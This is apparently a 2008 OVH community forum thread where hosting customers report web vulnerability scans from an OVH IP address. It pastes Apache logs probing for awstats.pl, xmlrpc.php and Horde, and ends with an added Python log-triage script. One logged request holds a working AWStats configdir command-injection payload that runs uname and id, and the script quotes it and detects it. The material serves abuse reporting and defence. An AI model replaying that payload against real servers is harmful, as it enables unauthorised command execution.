OVH Community, your new community space.

Web vulnerability attack from OVH member


gregoryfenton
27-06-2008, 09:20
Thank you very much Oles.

I knew going with OVH was the right thing to do

oles@ovh.net
27-06-2008, 07:42
> 91.121.13.194

I have the alerts from this IP: Jun 24 20:51:58 to SSH
and Jun 26 18:46:44 to WWW. Soon all servers that scan
will be rebooted in 15 seconds into rescue.

gregoryfenton
27-06-2008, 00:06
Nah not scared at all, I just happened to be tailing the access log waiting for someone to connect to a document I was hosting when I saw the attack.

I only posted here because it seemed a more logical place to report it - your post confirms that I am not the only person being probed by the IP.

Maybe someone up high needs to have a quiet word with the user of the IP address about the legality of attacking servers?

Murph
26-06-2008, 23:40
Nothing new there, to be honest. Some malware is optimised to attack nearby hosts, some has been human-targeted at nearby hosts, and random chance will make some attacks local.

If you want something done about it, you'd be better off sending it to abuse@ovh.net. To be honest, I mostly ignore them, although persistent offenders tend to get reported and/or firewalled. The Internet is an evil, nasty, vicious, malware-infested swamp (as a sysadmin/netadmin, you have to assume that 100% of public hosts, connections, requests, etc. are evil), so you need to have all of your open services fully patched, protected, and properly configured at all times.

If you maintain your system well, subscribe to security and errata bulletins appropriate to your platform and applications, and are very careful with configuration and home-grown code, then you can mostly ignore the constant stream of incoming crud. If not, you shouldn't be running a server which accepts connections from the public net, as you'll soon be part of the problem (your host will be compromised and used for attacks, fraud, and other illegal activity or general maliciousness, some of which could result in an awkward conversation with your friendly neighbourhood law enforcement).

Scared yet? Well, unless you are a seasoned Internet sysadmin, you should be scared.

And confirmed, 91.121.13.194 attacked my server too:

Code:
91.121.13.194 - - [26/Jun/2008:17:05:05 +0000] "GET /awstats/awstats/wwwroot/cgi-bin/awstats.pl HTTP/1.1" 403 1492 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 230 1986
... lots of crud omitted ...
91.121.13.194 - - [26/Jun/2008:18:59:13 +0000] "GET /mag/blog/xmlrpc.php HTTP/1.1" 403 1492 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 207 1986
Here's a count of the individual, probably malicious requests I have received from 91.121.0.0/16 since 12/Jun/2008 (all of these are requests made with an invalid vhost):

123 91.121.118.225
86 91.121.13.194
33 91.121.158.38
32 91.121.146.224
28 91.121.123.165
12 91.121.15.201
6 91.121.22.42
6 91.121.147.13
4 91.121.0.66
3 91.121.9.163

And to put it in context, here's a list of all hosts outside 91.121.0.0/16 sending the same invalid requests since 12/Jun:

848 194.16.54.75
639 81.25.144.138
320 91.65.224.23
255 213.186.41.96
245 87.118.120.2
99 62.193.233.138
98 66.132.150.72
63 140.247.162.153
56 74.55.16.66
44 81.208.92.7
40 80.254.49.82
33 125.129.220.241
25 195.218.5.16
22 213.251.135.133
21 212.183.8.27
12 82.211.81.100
10 86.104.228.111

gregoryfenton
26-06-2008, 22:58
Continued as this forum limits posts to 10,000 characters.
Code:
91.121.13.194 - - [26/Jun/2008:20:38:50 +0200] "GET /xmlsrv/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:38:51 +0200] "GET /blog/xmlrpc.php HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:38:51 +0200] "GET /drupal/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:38:51 +0200] "GET /community/xmlrpc.php HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:38:51 +0200] "GET /blogs/xmlrpc.php HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:38:51 +0200] "GET /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:38:51 +0200] "GET /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 309 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:38:51 +0200] "GET /blogtest/xmlsrv/xmlrpc.php HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:38:51 +0200] "GET /b2/xmlsrv/xmlrpc.php HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:38:51 +0200] "GET /b2evo/xmlsrv/xmlrpc.php HTTP/1.1" 404 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:38:51 +0200] "GET /wordpress/xmlrpc.php HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:38:51 +0200] "GET /phpgroupware/xmlrpc.php HTTP/1.1" 404 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:38:51 +0200] "GET /adxmlrpc.php HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:38:52 +0200] "GET /adserver/adxmlrpc.php HTTP/1.1" 404 308 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:38:52 +0200] "GET /phpAdsNew/adxmlrpc.php HTTP/1.1" 404 309 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:38:58 +0200] "GET /Ads/adxmlrpc.php HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:39:01 +0200] "GET /xmlrpc.php HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:39:01 +0200] "GET /xmlrpc/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:39:01 +0200] "GET /xmlsrv/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:39:22 +0200] "GET /b2/xmlsrv/xmlrpc.php HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:39:22 +0200] "GET /b2evo/xmlsrv/xmlrpc.php HTTP/1.1" 404 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:39:22 +0200] "GET /wordpress/xmlrpc.php HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:39:22 +0200] "GET /phpgroupware/xmlrpc.php^M HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:39:25 +0200] "GET /mag/blog/xmlrpc.php HTTP/1.1" 404 306 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:39:25 +0200] "GET  HTTP/1.1" 400 317 "-" "-"

gregoryfenton
26-06-2008, 22:57
grep from my access.log
Code:
91.121.13.194 - - [26/Jun/2008:18:51:29 +0200] "GET /thisdoesnotexistahaha.php HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:18:51:29 +0200] "GET /awstat/cgi-bin/awstats.pl HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:18:51:29 +0200] "GET /awstats.pl HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:18:51:29 +0200] "GET /awstats.pl/awstats.pl HTTP/1.1" 404 308 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:18:51:29 +0200] "GET /awstats/awstats.pl HTTP/1.1" 200 924 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:18:51:44 +0200] "GET /cgi-bin/stats/awstats.pl HTTP/1.1" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:18:51:44 +0200] "GET /cgi/awstats.pl HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:18:51:44 +0200] "GET /cgi/stats/awstats.pl HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:18:51:44 +0200] "GET /scgi-bin/awstats.pl HTTP/1.1" 404 306 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:18:51:44 +0200] "GET /scgi-bin/awstats/awstats.pl HTTP/1.1" 404 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:18:51:44 +0200] "GET /scgi/awstats.pl HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:18:51:44 +0200] "GET /scgi/stats/awstats.pl HTTP/1.1" 404 308 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:18:51:44 +0200] "GET /scripts/awstats.pl HTTP/1.1" 404 305 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:18:51:44 +0200] "GET /scripts/awstats/awstats.pl HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:18:51:44 +0200] "GET /scripts/awstats/awstats.pl/awstats.pl HTTP/1.1" 404 324 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:18:51:45 +0200] "GET /secure/web-admin/awstats.pl HTTP/1.1" 404 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:18:51:48 +0200] "GET /stats/awstats.pl HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:18:51:54 +0200] "GET /web-admin/awstats.pl HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:18:52:00 +0200] "GET /~quasi/awstats.pl HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:18:52:06 +0200] "GET /technical/software/awstats/cgi-bin/awstats.pl HTTP/1.1" 404 332 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:18:52:06 +0200] "GET /_system_/awstats/awstats.pl HTTP/1.1" 404 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:19:39:37 +0200] "GET /awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3buname%20%2dsnrmo%3bid%3becho%20e_exp%3b%2500 HTTP/1.1" 200 1050 "-" "-"
91.121.13.194 - - [26/Jun/2008:20:03:15 +0200] "GET /thisdoesnotexistahaha.php HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:03:15 +0200] "GET /Horde-2.1.1/ HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:03:15 +0200] "GET /Horde-2.1.2/ HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:03:15 +0200] "GET /Horde-2.2.9/ HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:03:15 +0200] "GET /Horde-3.0.9/ HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:03:15 +0200] "GET /Horde-3.1.1/ HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:03:15 +0200] "GET /Horde/ HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:03:16 +0200] "GET /Horde0/ HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:03:17 +0200] "GET /Horde1/ HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:03:17 +0200] "GET /Horde2/ HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:03:17 +0200] "GET /Horde3/ HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:03:17 +0200] "GET /horde-2.1.1/ HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:03:17 +0200] "GET /horde-2.1.2/ HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:03:17 +0200] "GET /horde-2.2.9/ HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:03:17 +0200] "GET /horde-3.0.9/ HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:03:17 +0200] "GET /horde-3.1.1/ HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:03:17 +0200] "GET /horde/ HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:03:18 +0200] "GET /horde0/ HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:03:18 +0200] "GET /horde1/ HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:03:18 +0200] "GET /horde2/ HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:03:18 +0200] "GET /horde3/ HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:38:49 +0200] "GET /thisdoesnotexistahaha.php HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:38:49 +0200] "GET /adxmlrpc.php HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:38:49 +0200] "GET /adserver/adxmlrpc.php HTTP/1.1" 404 308 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:38:49 +0200] "GET /phpAdsNew/adxmlrpc.php HTTP/1.1" 404 309 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:38:49 +0200] "GET /phpadsnew/adxmlrpc.php HTTP/1.1" 404 309 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:38:49 +0200] "GET /phpads/adxmlrpc.php HTTP/1.1" 404 306 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:38:49 +0200] "GET /Ads/adxmlrpc.php HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:38:49 +0200] "GET /ads/adxmlrpc.php HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:38:49 +0200] "GET /xmlrpc.php HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.13.194 - - [26/Jun/2008:20:38:49 +0200] "GET /xmlrpc/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
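Two things in this thread are worth turning into a repeatable check: Murph's per-IP tally of probe requests (optionally restricted to 91.121.0.0/16), and the one request in the grep above that is not a simple 404 probe, the 19:39:37 hit on /awstats/awstats.pl with a configdir= query string that returned 200. Decoded, that query string is a shell command chain (`|echo ;echo b_exp;uname -snrmo;id;echo e_exp;%00`), the classic AWStats configdir command-injection pattern, so it deserves a different triage bucket than the 404s around it. The script below is an added example, not code from either poster: it parses Apache combined-format lines, URL-decodes the query, tags each request as probe, injection or malformed, and counts suspicious requests per source IP. It assumes the combined log format (Murph's invalid-vhost criterion needs a format that logs %{Host}i, which combined does not, so path patterns are used instead), and the sample lines are a mix of lines quoted from this thread and constructed ones (the 10.0.0.5 and 91.121.118.225 lines are made up for illustration).

```python
"""Added example (not from the OVH thread): triage Apache combined-log lines
for scanner probes and command-injection attempts, then tally per source IP.

Assumptions not on the original page: combined log format, and the probe-path
list is a hand-picked subset of what the scanner in the thread requested.
"""
import ipaddress
import re
from collections import Counter
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)

# Paths the scanner in the thread hunted for. A hit is a probe regardless of
# status code: a 404 is still reconnaissance, and a 200 means the target exists.
PROBE_PATTERNS = (
    re.compile(r"awstats\.pl", re.I),
    re.compile(r"xmlrpc\.php", re.I),
    re.compile(r"/horde", re.I),
)
# Shell metacharacters that appear once the query string is URL-decoded.
# The thread's configdir= request double-encodes its NUL as %2500, so after one
# decode the text "%00" remains; match that literally as well.
INJECTION_RE = re.compile(r"[|;`]|%00|\x00")


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    parts = d["req"].split(" ")
    # A request line is "METHOD PATH PROTO"; an empty path is malformed
    # (cf. the 'GET  HTTP/1.1' 400 in the thread).
    if len(parts) != 3 or not parts[1]:
        d["method"], d["path"], d["query"], d["malformed"] = None, "", "", True
    else:
        d["method"] = parts[0]
        path, _, query = parts[1].partition("?")
        d["path"], d["query"], d["malformed"] = path, unquote(query), False
    d["status"] = int(d["status"])
    return d


def classify(rec):
    """Return 'injection', 'probe', 'malformed', or None when it looks benign."""
    if rec["malformed"]:
        return "malformed"
    if INJECTION_RE.search(rec["query"]):
        return "injection"
    if any(p.search(rec["path"]) for p in PROBE_PATTERNS):
        return "probe"
    return None


def tally(lines, network=None):
    """Count suspicious requests per source IP, optionally limited to a CIDR
    (Murph's post did this by hand for 91.121.0.0/16)."""
    net = ipaddress.ip_network(network) if network else None
    counts = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None or classify(rec) is None:
            continue
        if net is None or ipaddress.ip_address(rec["ip"]) in net:
            counts[rec["ip"]] += 1
    return counts


def decode_injection(line):
    """Return the decoded query string of a command-injection request, else None."""
    rec = parse_line(line)
    if rec is None or classify(rec) != "injection":
        return None
    return rec["query"]


UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
# Sample input: first three lines are quoted from the thread; the rest are constructed.
SAMPLE_LOG = [
    f'91.121.13.194 - - [26/Jun/2008:18:51:29 +0200] "GET /awstats/awstats.pl HTTP/1.1" 200 924 "-" "{UA}"',
    '91.121.13.194 - - [26/Jun/2008:19:39:37 +0200] "GET /awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3buname%20%2dsnrmo%3bid%3becho%20e_exp%3b%2500 HTTP/1.1" 200 1050 "-" "-"',
    '91.121.13.194 - - [26/Jun/2008:20:39:25 +0200] "GET  HTTP/1.1" 400 317 "-" "-"',
    f'91.121.118.225 - - [26/Jun/2008:21:10:02 +0200] "GET /blog/xmlrpc.php HTTP/1.1" 404 302 "-" "{UA}"',
    f'194.16.54.75 - - [26/Jun/2008:21:12:40 +0200] "GET /xmlrpc.php HTTP/1.1" 404 297 "-" "{UA}"',
    '10.0.0.5 - - [26/Jun/2008:21:15:00 +0200] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, n in tally(SAMPLE_LOG, "91.121.0.0/16").most_common():
        print(f"{n:>4} {ip}")
    print("decoded payload:", decode_injection(SAMPLE_LOG[1]))
```

The 200 on the configdir= request is the line to act on: a 404 probe tells you a scanner exists, but a 200 on a request carrying shell metacharacters tells you the target script is present and may have executed them, so the next step is to check whether that awstats.pl is a version that treats configdir as a pipe-open, and to look at the process accounting and outbound connections from that host for the timestamp in question. Feeding real logs through `tally()` instead of the sample list is a matter of passing `open("/var/log/apache2/access.log")`.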